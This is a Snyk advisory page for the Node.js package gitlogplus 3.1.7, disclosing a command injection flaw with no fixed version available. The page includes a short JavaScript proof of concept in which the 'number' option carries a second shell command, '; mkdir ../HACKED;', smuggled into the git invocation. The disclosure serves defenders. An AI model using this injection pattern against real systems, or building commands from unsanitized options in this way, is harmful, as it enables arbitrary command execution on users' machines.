Homepage
About Snyk

gitlogplus@3.1.7 vulnerabilities

Git log parser for Node.JS

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the gitlogplus package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Command Injection

gitlogplus is a Git log parser for Node.JS

Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.

PoC by Rafal Janicki

# 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository

"use strict"

const gitlog = require('gitlogplus');
const options =
{
repo: __dirname + '/git',
number: '20; mkdir ../HACKED; git log '
};

let commits = gitlog(options);
console.log(commits);

How to fix Command Injection?

There is no fixed version for gitlogplus.

*
Go back to all versions of this package